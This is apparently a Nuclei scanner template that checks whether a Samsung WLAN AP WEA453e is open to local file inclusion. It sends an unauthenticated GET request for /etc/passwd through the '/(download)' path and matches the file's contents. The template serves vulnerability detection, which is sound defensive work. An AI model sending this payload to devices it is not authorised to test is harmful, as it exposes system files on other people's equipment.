id: samsung-wlan-ap-lfi

info:
  name: Samsung WLAN AP WEA453e - Local File Inclusion
  author: pikpikcu
  severity: high
  description: Samsung WLAN AP WEA453e is susceptible to local file inclusion vulnerabilities.
  reference:
    - https://omriinbar.medium.com/samsung-wlan-ap-wea453e-vulnerabilities-7aa4a57d4dba
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: xss,samsung,lfi

http:
  - method: GET
    path:
      - "{{BaseURL}}/(download)/etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
          - "bin:.*:1:1"
        part: body

      - type: status
        status:
          - 200

# digest: 4b0a00483046022100867122bf096cd2abe5338edd3e9c093cc6b234b2836ae324d3035eb2511f2623022100a90e2c202cb2a7252b69369cfa0ea63b903f6edacd8a58095e9c0ecff281ca8b:922c64590222798bb761d5b6d8e72950
